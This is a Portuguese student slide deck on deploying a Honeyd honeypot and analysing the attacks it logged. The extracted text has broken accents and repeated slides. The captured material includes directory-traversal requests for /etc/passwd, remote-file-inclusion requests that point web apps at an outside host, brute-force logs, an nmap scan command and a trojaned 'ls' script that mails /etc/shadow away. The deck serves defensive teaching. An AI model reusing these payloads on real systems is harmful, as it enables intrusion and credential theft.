Uso de HoneyPots com o Honeyd

       Pedro Pereira             Ulisses Costa

Criptografia e Seguran¸a de Sistemas de Info...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
O que s˜o HoneyPot’s?
       a




     Programas que emulam vulnerabilidades conhecidas
     Armadilhas para detectar ou ...
Tipos de HoneyPot’s




     Personalidade
         Alta interac¸˜o (high-interaction)
                     ca
         Ba...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Honeyd




     Cria¸˜o de hosts virtuais
         ca
     Configura¸˜o dos hosts
             ca
     Suporte para mais de...
Configura¸˜o do Honeyd
        ca



  bash > farpd 192.168.1.50 -i eth0



  # File : / etc / defaults / honeyd
  # Defaul...
O comando -c hostname:port:username:password




        Gera¸˜o de estat´
            ca          ısticas parciais do Hon...
Configura¸˜o do HoneyPot(1/2)
        ca

  # File : / etc / honeypot / honeyd . conf
  # Configuracao do honeypot
  create...
Configura¸˜o do HoneyPot(2/2)
        ca


  add win2k udp port 137 proxy          $ipsrc :137
  add win2k udp port 138 pro...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Ficheiros




  /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3
  /var/log/honeypot/web.log HTTP
  /var/log/honeypot/honeyd.l...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Formato do ficheiro /var/log/honeypot/honeyd.log

   Data     Protocolo   T           IPOrig         PortOrig     IPDst    ...
Formato do ficheiro /var/log/honeypot/honeyd.log




  2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.5...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
SMTP




   Usado do lado do servidor para enviar mensagens
   Para receber usams POP3 ou IMAP




             Pedro Pere...
SMTP - HoneyPot




           Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Comando EHLO em SMTP




    Comando para identificar clientes




              Pedro Pereira, Ulisses Costa   Uso de Hone...
Comando EHLO em SMTP

 S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329
       rea...
Spamm em servidores SMTP




            Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Solu¸oes
    c˜




     EHLO [host]
     verificar se resolvem




               Pedro Pereira, Ulisses Costa   Uso de Ho...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Ataques




  HELO 8 2.155.248.223
  MAIL FROM : < jk9l3g4jle@yahoo . com >
  RCPT TO : < ss e en n dd 12 0 1@ y ah oo . c...
Ataques


  HELO 82.155.251.32
  MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com >
  RCPT TO : < ss e en n dd 12 0 1@ y ah oo ....
Ataques



  HELO 8 2.155.103.147
  MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw >
  RCPT TO : < vjd39hww@yahoo ....
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
HTTP hit’s




             Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
User agent: webcollage/1.135a



  -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP
         quot; ,...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Directory traversal


           Tamb´m conhecido como dot dot slash attack (../)
               e
           Explora a in...
Directory traversal




  GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1



  --...
Directory traversal




  GET . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / . .  / etc / passwd HTTP /1.1...
Directory traversal




  GET . .  . .  . .  . .  . .  . .  . .  . .  . .  . .  etc  passwd HTTP /1.1



  -- MARK - - ,qu...
Directory traversal




  GET // etc / passwd HTTP /1.1




  -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; I...
Conclus˜o
       a




     No HoneyPot n˜o foi bem sucedido
                  a
     Sistema de baixa interactividade
   ...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Morfeus Scanner




     Procura vulnerabilidades PHP
     Vulnerabilidades conhecidas




               Pedro Pereira, U...
Morfeus Scanner - WebCalendar



        Cria¸˜o de calend´rios online
            ca           a
        Vulnerabilidade ...
Morfeus Scanner - Mambo Joomla


          CMS’s muito conhecido
          O atacante pretende definir a vari´vel
         ...
Prevenir ataques do Morfeus Scanner




  Uma maneira de bloquear este tipo de ataques vindos do MFS ´    e
  adicionar as...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
Tentativa de brute force no servidor POP3




             Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Tentativa de brute force no servidor POP3
  ...
  -- MARK - - ,quot; Mon Dec 22 11:34:48 WET 2008quot; ,quot; exchange / P...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
SSH
 Aqui est´ um gr´fico que mostra as tentativas de usernames:
         a      a




               Pedro Pereira, Ulisse...
SSH
 E o seguinte gr´fico mostra as tentativas de passwords:
                a




               Pedro Pereira, Ulisses Co...
Sum´rio
   a

 1   Introdu¸˜o
            ca
       HoneyPot’s
       Honeyd

 2   Log
       Log principal do Honeyd

 3 ...
A amea¸a
      c




           Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Port scanning




      Descobrir m´quinas e respectivos portos
                 a
      Cria¸˜o de pacotes personalizados...
Port scanning




      Open ou Accepted: A m´quina enviou uma resposta a indicar
                              a
      qu...
Port scanning




  Tipos de t´cnicas
            e
      TCP/SYN
      TCP Connect
      UDP




                Pedro Pe...
TCP Connect




              Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Port scanning




  Optimiza¸˜o
          ca
  golden@golden - laptop :~ $ sudo nmap - sS - sV 192.168.100.0/24
  ...
  Nm...
Ataque




     For¸a bruta / Dicion´rios
        c                a
     Explora¸˜o de vulnerabilidades
            ca


...
SSH




      Porto 22
      Atacado em For¸a bruta / Dicion´rios
                    c                a
      cat /var/lo...
SSH - log
  Dec 24 01:24:46 golden - laptop sshd [23906]: Invalid user oracle from
       89.235.152.18
  Dec 24 01:24:46 ...
SSH




      Defesa:
          IPTables
          passwords mais fortes
          Autentica¸˜o RSA
                   ca
...
SSH




      password m´
                ınimo de 8 caracteres
      password nao triviais
      combina¸˜es alfanum´rica...
SSH




 http://www.passwordmeter.com/



              Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
SSH - Autentica¸˜o RSA
               ca


       Geramos o par de chaves com o comando “ssh-keygen -t rsa”.
   1

       ...
Vulnerabilidades




      Comportamento n˜o previsto num artefacto de software
                     a
          Buffer Ove...
Explora¸˜o de vulnerabilidades
       ca


        Exploit
               ´
               E a designa¸˜o dada a um peda¸o...
Buffer Overflow




  user@honeypot :~ $ gcc exploit . c -o exploit
  user@honeypot :~ $ ./ exploit thisisanexploit
  *** st...
ShellCode




     Um conjunto de instru¸˜es (em c´digo m´quina ou n˜o)
                          co         o      a     ...
RootKits




         Conjunto de programas malicionsos (trojans, backdoors

         chkrootkit e rkhunter (Linux)1 ;
   ...
Trojaned ls




  #!/ bin / bash

  mv / bin / ls / bin / ls . old

  / bin / echo quot; cat / etc / shadow | mail intruso...
Conclus˜o
       a




            Pedro Pereira, Ulisses Costa   Uso de HoneyPots com o Honeyd
Upcoming SlideShare
Loading in...5
×

Uso de Honeypots com Honeyd

1,066

Published on

Trabalho sobre a implementação de Honeypots recorrendo ao Honeyd

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,066
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
46
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Uso de Honeypots com Honeyd

  1. 1. Uso de HoneyPots com o Honeyd Pedro Pereira Ulisses Costa Criptografia e Seguran¸a de Sistemas de Informa¸˜o c ca 18 de Dezembro de 2008 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  2. 2. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  3. 3. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  4. 4. O que s˜o HoneyPot’s? a Programas que emulam vulnerabilidades conhecidas Armadilhas para detectar ou impedir ataques Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  5. 5. Tipos de HoneyPot’s Personalidade Alta interac¸˜o (high-interaction) ca Baixa interac¸˜o (low-interaction) ca Modus operandi Servidor Cliente Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  6. 6. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  7. 7. Honeyd Cria¸˜o de hosts virtuais ca Configura¸˜o dos hosts ca Suporte para mais de 1000 personalidades Muitas dezenas de scripts para emula¸˜o de servi¸os ca c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  8. 8. Configura¸˜o do Honeyd ca bash > farpd 192.168.1.50 -i eth0 # File : / etc / defaults / honeyd # Defaults for honeyd initscript # Correr como deamon RUN =quot; yes quot; # Interface de rede onde o honeyd vai escutar pedidos INTERFACE =quot; eth0 quot; # Rede que o honeyd simula NETWORK =192.168.1.50 # Conjunto de opcoes # -c hostname : port : username : password OPTIONS =quot; - c localhost :12345: username : password quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  9. 9. O comando -c hostname:port:username:password Gera¸˜o de estat´ ca ısticas parciais do Honeyd bash > honeydstats -- os_report / etc / honeypot / os -- port_report / etc / honeypot / port -- spammer_report / etc / honeypot / spam -- country_report / etc / honeypot / country -f / etc / honeypot / honeydstats . conf -l localhost -p 12345 # File : / etc / honeypot / honeydstats . conf # Ficheiro de configuracao do honeydstats username : password Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  10. 10. Configura¸˜o do HoneyPot(1/2) ca # File : / etc / honeypot / honeyd . conf # Configuracao do honeypot create win2k set win2k personality quot; Microsoft Windows 2000 SP2 quot; set win2k default tcp action reset set win2k default udp action reset set win2k default icmp action block set win2k uptime 3567 add win2k tcp port 21 quot; sh / usr / share / honeyd / scripts / win32 / win2k / msftp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 23 quot; perl / usr / share / honeyd / scripts / unix / linux / suse7 .0/ telnetd . sh quot; add win2k tcp port 25 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - smtp . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 80 quot; sh / usr / share / honeyd / scripts / win32 / win2k / iis . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 110 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - pop3 . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 143 quot; sh / usr / share / honeyd / scripts / win32 / win2k / exchange - imap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 389 quot; sh / usr / share / honeyd / scripts / win32 / win2k / ldap . sh $ipsrc $sport $ipdst $dport quot; add win2k tcp port 5901 quot; sh / usr / share / honeyd / scripts / win32 / win2k / vnc . sh $ipsrc $sport $ipdst $dport quot; add win2k udp port 161 quot; perl / usr / share / honeyd / scripts / unix / general / snmp / fake - snmp . pl public private -- config = scripts / unix / general quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  11. 11. Configura¸˜o do HoneyPot(2/2) ca add win2k udp port 137 proxy $ipsrc :137 add win2k udp port 138 proxy $ipsrc :138 add win2k udp port 445 proxy $ipsrc :445 add win2k tcp port 137 proxy $ipsrc :137 add win2k tcp port 138 proxy $ipsrc :138 add win2k tcp port 139 proxy $ipsrc :139 add win2k tcp port 445 proxy $ipsrc :445 bind 192.168.1.50 win2k$ Imposs´ monitorizar portos NETBIOS ıvel Grade complexidade Decis˜o reencaminhar para source a Inicializar o nosso HoneyPot: bash > / etc / init . d / honeyd start Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  12. 12. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  13. 13. Ficheiros /var/log/honeyd.txt SMTP, Telnet, IMAP, POP3 /var/log/honeypot/web.log HTTP /var/log/honeypot/honeyd.log Log principal do Honeyd Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  14. 14. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  15. 15. Formato do ficheiro /var/log/honeypot/honeyd.log Data Protocolo T IPOrig PortOrig IPDst PortDst Info Comment´rio a ... tcp(6) S 88.44.123.210 3637 ... 139 [Windows XP SP1] ... tcp(6) S 82.155.0.49 22617 ... 139 ... tcp(6) E 82.155.1.160 4399 ... 445: 00 ... tcp(6) - 82.155.122.18 61582 ... 139: 40 R ... icmp(1) - 80.236.5.27 ...: 3(13): 56 ... tcp(6) - 82.154.64.174 34507 ... 445: 40 RA ... tcp(6) - 124.8.74.33 1806 ... 25: 70 FPA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1] ... tcp(6) - 168.167.152.228 58274 ... 445: 52 FA ... tcp(6) - 82.155.57.245 58274 ... 445: 52 PA [Windows XP SP1] ... tcp(6) - 193.136.19.149 58274 ... 445: 52 PA ... tcp(6) - 88.175.73.149 4332 ... 139: 40 R [Windows XP SP1] ... tcp(6) - 82.155.137.139 1230 ... 445: 40 A [Windows XP SP1] ... tcp(6) - 82.155.7.176 2794 ... 445: 40 A ... tcp(6) - 82.155.116.238 3578 ... 23: 60 S [Linux 2.6 .1-7] ... tcp(6) - 124.207.41.198 48804 ... 23: 40 S ... udp(17) - 192.168.1.254 67 ... 68: 298 Data no formato: 2008-12-15-22:59:03.4039 IPDst ´ sempre o mesmo (neste caso) - 192.168.1.50 e Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  16. 16. Formato do ficheiro /var/log/honeypot/honeyd.log 2009 -01 -01 -05:57:28.0971 tcp (6) S 79.25.93.226 46984 192.168.1.50 80 2009 -01 -01 -05:58:40.3750 tcp (6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008 Para TCP e UDP n˜o s˜o gravadas todas as transmiss˜es de aa o pacotes Seria demasiando verboso Apenas a quantidade transmitida Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  17. 17. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  18. 18. SMTP Usado do lado do servidor para enviar mensagens Para receber usams POP3 ou IMAP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  19. 19. SMTP - HoneyPot Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  20. 20. Comando EHLO em SMTP Comando para identificar clientes Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  21. 21. Comando EHLO em SMTP S : 220 bps - pc9 . local . mynet Microsoft ESMTP MAIL Service , Version : 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009 C : EHLO windows S : 250 - bps - pc9 . local . mynet Hello [12] S : 250 - TURN S : 250 - ATRN S : 250 - SIZE S : 250 - ETRN S : 250 - PIPELINING S : 250 - DSN S : 250 - E N H A N C E D S T A TU S C O D E S S : 250 -8 bitmime S : 250 - BINARYMIME S : 250 - CHUNKING S : 250 - VRFY S : 250 - X - EXPS GSSAPI NTLM LOGIN S : 250 - X - EXPS = LOGIN S : 250 - AUTH GSSAPI NTLM LOGIN S : 250 - AUTH = LOGIN S : 250 - X - LINK2STATE S : 250 - XEXCH50 } S : 250 OK Identifica¸˜o por nomes de dominios n˜o reais ca a Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  22. 22. Spamm em servidores SMTP Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  23. 23. Solu¸oes c˜ EHLO [host] verificar se resolvem Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  24. 24. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  25. 25. Ataques HELO 8 2.155.248.223 MAIL FROM : < jk9l3g4jle@yahoo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.248.223 2008 -12 -11 -09:45:27.9566 tcp (6) S 124.11.193.219 2774 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -11 -09:46:33.6989 tcp (6) E 124.11.193.219 2774 192.168.1.50 25: 178 920 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  26. 26. Ataques HELO 82.155.251.32 MAIL FROM : < gt 48m7 g3k 6f@ yah oo . com > RCPT TO : < ss e en n dd 12 0 1@ y ah oo . com . hk > DATA Subject : Super webscan open relay check succeded , hostname = 82.155.251.32 2008 -12 -23 -12:18:11.3939 tcp (6) S 114.44.42.34 2748 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:11.3953 tcp (6) S 114.44.42.34 2750 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:18:12.1966 tcp (6) E 114.44.42.34 2750 192.168.1.50 25: 0 116 2008 -12 -23 -12:18:13.1996 tcp (6) E 114.44.42.34 2748 192.168.1.50 25: 0 232 2008 -12 -23 -12:21:55.1773 tcp (6) S 114.44.42.34 3347 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -12:21:57.1324 tcp (6) E 114.44.42.34 3347 192.168.1.50 25: 0 232 2008 -12 -23 -14:06:30.5003 tcp (6) S 114.44.42.34 1634 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:30.5023 tcp (6) S 114.44.42.34 1635 192.168.1.50 25 [ Windows XP SP1 ] 2008 -12 -23 -14:06:43.0390 tcp (6) E 114.44.42.34 1635 192.168.1.50 25: 177 335 2008 -12 -23 -14:06:51.4612 tcp (6) E 114.44.42.34 1634 192.168.1.50 25: 177 418 Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  27. 27. Ataques HELO 8 2.155.103.147 MAIL FROM : < tt c 58 5t t c5 8 5@ ya h oo . com . tw > RCPT TO : < vjd39hww@yahoo . com . tw > DATA Received : from ( [ 1 4 5 . 2 0 0. 2 0 1 . 1 1 4 ] ) by 82 .155.103.147 id <9624303 -98482 >; Tue , 06 Jan 2009 21:16:04 -0100 Message - ID : < w58 $6a4j1fqc6q@ocjc8ujvz > From : quot;quot; < t t c5 85 t tc 5 85 @y a ho o . com . tw > To : < vjd39hww@yahoo . com . tw > Subject : BC_82 .155.103.147 Date : Tue , 06 Jan 09 21:16:04 GMT MIME - Version : 1.0 Content - Type : multipart / alternative ; boundary =quot; - - - -= _ N e x t P a r t _ 0 0 0 _ 0 0 0 D _ 0 1 C 2 C C 6 0 .49 F4EC70 quot; Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  28. 28. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  29. 29. HTTP hit’s Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  30. 30. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  31. 31. User agent: webcollage/1.135a -- MARK - - ,quot; Mon Dec 15 23:09:00 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;92.240.68.152quot; ,quot;192.168.1.50quot; ,56886 ,80 , quot; GET http :// www . morgangirl . com / pics / land / land1 . jpg HTTP /1.0 User - Agent : webcollage /1.135 a Referer : http :// random . yahoo . com / fast / ryl Host : www . morgangirl . com quot;, -- ENDMARK - - Tentativa de obter uma imagem atrav´s do HoneyPot e HoneyPotpode ter sido “visto” por um proxy scanner HoneyPot como um proxy aberto Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  32. 32. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  33. 33. Directory traversal Tamb´m conhecido como dot dot slash attack (../) e Explora a insuficiˆncia de valida¸˜o de pedidos e ca Ficheiros do sistema GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:57 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59706 ,80 , quot; GET %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  34. 34. Directory traversal GET . . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:58 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59711 ,80 , quot; GET %2 E %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 F %2 E %2 E %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  35. 35. Directory traversal GET . . / . . / . . / . . / . . / . . / . . / . . / . . / . . / etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:02 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59727 ,80 , quot; GET %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 F %2 E %2 E %5 C %2 Fetc %5 C %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  36. 36. Directory traversal GET . . . . . . . . . . . . . . . . . . . . etc passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:21:04 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59740 ,80 , quot; GET %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 C %2 E %2 E %5 Cetc %5 Cpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  37. 37. Directory traversal GET // etc / passwd HTTP /1.1 -- MARK - - ,quot; Sun Jan 4 05:20:59 WET 2009quot; ,quot; IIS / HTTP quot; ,quot;82.173.198.254quot; ,quot;192.168.1.50quot; ,59700 ,80 , quot; GET %2 F %2 Fetc %2 Fpasswd HTTP /1.1 User - Agent : Nmap NSE Connection : close Host : 82.155.127.187 quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  38. 38. Conclus˜o a No HoneyPot n˜o foi bem sucedido a Sistema de baixa interactividade No nosso HoneyPot erro 302 Object moved Utiliza¸˜o de NMap scripting engine ca Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  39. 39. Sum´rio a 1 Introdu¸˜o ca HoneyPot’s Honeyd 2 Log Log principal do Honeyd 3 SMTP Open mail relay 4 HTTP webcollage/1.135a Directory traversal Morfeus Scanner WebCalendar Mambo/Joomla Prevenir ataques do Morfeus Scanner Ataque ao POP3 SSH 5 A amea¸a c Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  40. 40. Morfeus Scanner Procura vulnerabilidades PHP Vulnerabilidades conhecidas Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  41. 41. Morfeus Scanner - WebCalendar Cria¸˜o de calend´rios online ca a Vulnerabilidade no ficheiro send reminder.php -- MARK - - ,quot; Wed Dec 24 16:07:29 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,54941 ,80 , quot; GET / webcalendar / tools / send_reminders . php ? noSet =0& includedir = http : / / 2 17 .2 0 .1 7 2. 12 9 / twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
  42. 42. Morfeus Scanner - Mambo Joomla CMS’s muito conhecido O atacante pretende definir a vari´vel a mosConfig absolute path do ficheiro index.php -- MARK - - ,quot; Wed Dec 24 16:07:34 WET 2008quot; ,quot; IIS / HTTP quot; ,quot;74.52.10.34quot; ,quot;192.168.1.50quot; ,55438 ,80 , quot; GET / shop / index . php ? option = com_registration & task = register // boutique / index2 . php ? _REQUEST =& _REQUEST %5 boption %5 d = com_content & _REQUEST %5 bItemid %5 d =1& GLOBALS =& m o s C o n f i g _ a b s o l u t e _ p a t h = http :/ / 21 7 .2 0. 1 72 . 12 9/ twiki / a . gif ?/ HTTP /1.1 Accept : */* Accept - Language : en - us Accept - Encoding : gzip , deflate User - Agent : Morfeus Scanner Host : 82.155.248.190 Connection : Close quot;, -- ENDMARK - - Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd
